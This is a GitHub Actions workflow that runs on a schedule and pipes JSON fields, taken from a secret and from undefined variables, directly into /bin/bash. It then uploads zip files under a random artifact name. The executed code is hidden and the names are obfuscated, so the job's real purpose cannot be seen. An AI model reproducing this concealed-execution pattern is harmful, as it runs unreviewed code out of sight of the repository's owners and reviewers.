name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '2 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          boe22: ${{ secrets.boe22 }}
        run: |
          printf '%s' "$boe22" | jq -r .eg65291 | /bin/bash
          echo $sa134 | jq -r .c458 | /bin/bash
          printf '%s' "$qqdnw42710" | jq -r .dbcy329 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: cuMPuhYJ
          path: "*.zip"
          retention-days: 1
